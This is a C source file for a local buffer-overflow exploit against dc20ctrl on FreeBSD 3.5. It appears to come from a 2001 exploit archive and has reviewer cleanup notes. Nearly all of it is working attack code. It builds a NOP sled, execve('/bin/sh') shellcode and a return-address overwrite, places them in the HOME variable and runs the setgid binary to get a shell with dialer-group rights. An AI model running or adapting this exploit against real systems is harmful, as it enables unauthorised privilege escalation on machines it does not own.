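/*
 * dc20ctrl local exploit, FreeBSD 3.5 (i386).
 * Original by mray <joe@mindcrash-tech.com>; cleaned up in review.
 *
 * Target: /usr/local/bin/dc20ctrl.  According to the original author the
 * program copies the result of a getenv() call in session.c into a
 * fixed-size stack buffer without a bound check.  An oversized HOME value
 * therefore overwrites the saved return address; pointing it back into a
 * NOP sled runs the payload and yields a shell with gid=dialer.  The author
 * did not believe this was one of the bugs fixed in the FreeBSD team's
 * internal audit of the time.
 *
 * Usage: ./exploit [offset]
 *   offset is subtracted from the hard-coded EIP guess; try small multiples
 *   of 4 in either direction if the default does not land in the sled.
 *
 * Review notes (behaviour changes relative to the original):
 *   - The original malloc()'d BSIZE bytes and then wrote the terminating NUL
 *     at buf[BSIZE], one byte past the end of the allocation.  The buffer is
 *     now BSIZE + 1 bytes long.
 *   - The return address was written with `long *` stores in a loop that
 *     stepped 4 bytes per iteration.  On an LP64 host that writes twice the
 *     buffer size; the address is now an explicit 32-bit value (the target
 *     is i386, and EIP is a 32-bit stack address).
 *   - execlp()'s argument list must end with a null *pointer*.  A bare 0 is
 *     an int and is not pointer-sized on LP64 ABIs.
 *   - setenv()/execlp() failures are reported instead of being ignored.
 *   - The offset argument is validated with strtol() instead of atoi().
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BSIZE 520                     /* payload length needed to reach the saved return address */
#define EIP   0xbfbfdcb8UL            /* guessed address inside the NOP sled (FreeBSD 3.5 i386 stack) */
#define NOP   0x90                    /* i386 `nop` */
#define PATH  "/usr/local/bin/dc20ctrl"

/*
 * Payload.  The bytes decode to an execve("/bin/sh") call using the FreeBSD
 * i386 convention (mov $0x3b,%al; lcall $7,$0).  It contains no NUL byte,
 * so strlen() yields its full length and setenv() copies all of it.
 */
static char shellcode[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
    "\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
    "\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
    "\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
    "\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

/*
 * Parse an optional decimal/hex offset from argv[1].
 * Returns 0 on success and stores the value in *offset; returns -1 on
 * malformed or out-of-range input.
 */
static int parse_offset(int argc, char *argv[], int *offset)
{
    char *end;
    long val;

    *offset = 0;
    if (argc <= 1) {
        return 0;
    }

    errno = 0;
    val = strtol(argv[1], &end, 0);
    if (end == argv[1] || *end != '\0' || errno == ERANGE ||
        val < INT32_MIN || val > INT32_MAX) {
        return -1;
    }
    *offset = (int)val;
    return 0;
}

/*
 * Build the HOME payload:  [NOP sled][shellcode][32-bit return address],
 * exactly BSIZE bytes followed by a NUL terminator.  The caller owns and
 * must free() the returned buffer.  Returns NULL on allocation failure or
 * if the payload cannot fit into BSIZE bytes.
 */
static char *build_payload(uint32_t ret)
{
    size_t sc_len = strlen(shellcode);
    size_t sled;
    char *buf;

    /* Room for sled + shellcode + one return address slot. */
    if (sc_len + sizeof(ret) > BSIZE) {
        return NULL;
    }
    sled = BSIZE - sc_len - sizeof(ret);

    /* +1: setenv() needs a NUL-terminated string. */
    buf = malloc(BSIZE + 1);
    if (buf == NULL) {
        return NULL;
    }

    memset(buf, NOP, sled);
    memcpy(buf + sled, shellcode, sc_len);
    /* Host byte order: the exploit is built and run on the i386 target. */
    memcpy(buf + sled + sc_len, &ret, sizeof(ret));
    buf[BSIZE] = '\0';

    return buf;
}

int main(int argc, char *argv[])
{
    int offset;
    unsigned long address = EIP;
    char *buf;

    if (parse_offset(argc, argv, &offset) != 0) {
        fprintf(stderr, "usage: %s [offset]\n", argv[0]);
        return 1;
    }
    address -= (unsigned long)offset;

    buf = build_payload((uint32_t)address);
    if (buf == NULL) {
        fprintf(stderr, "error building payload (malloc or size)\n");
        return 1;
    }

    printf("ADDRESS 0x%lx OFFSET %d\n", address, offset);

    if (setenv("HOME", buf, 1) != 0) {
        perror("setenv");
        free(buf);
        return 1;
    }

    /*
     * The original passed an arbitrary taunt string as the -P value.  The
     * header states the overflow is in the getenv() path, so the value is
     * presumably irrelevant -- TODO confirm against dc20ctrl's option
     * parsing.  The argument list must be terminated by a null pointer.
     */
    execlp(PATH, "dc20ctrl", "-P", "x", (char *)NULL);

    /* Only reached if the exec failed. */
    perror("execlp");
    free(buf);
    return 1;
}

/* www.hack.co.za [10 march 2001] */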